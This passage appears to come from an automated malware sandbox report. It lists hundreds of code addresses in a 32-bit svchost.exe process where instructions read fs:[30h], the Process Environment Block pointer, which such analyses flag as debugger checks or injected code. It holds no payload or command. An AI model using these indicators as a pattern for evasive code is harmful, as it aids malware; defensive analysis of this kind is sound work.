            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]2_2_030EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]2_2_0302645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]2_2_0305245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]2_2_030BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]2_2_030EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]2_2_030364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]2_2_030644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]2_2_030BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]2_2_030304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h]2_2_03104B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]2_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]2_2_030D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h]2_2_03028B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]2_2_030DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]2_2_0302CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]2_2_030DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]2_2_0305EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]2_2_030BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]2_2_030BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]2_2_0306CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]2_2_0305EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]2_2_0306CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]2_2_030DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]2_2_03104A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]2_2_03068A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]2_2_03086AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]2_2_03030AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]2_2_030BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]2_2_030B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]2_2_030C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]2_2_030B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104940 mov eax, dword ptr fs:[00000030h]2_2_03104940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]2_2_030BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]2_2_030C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]2_2_030649D0
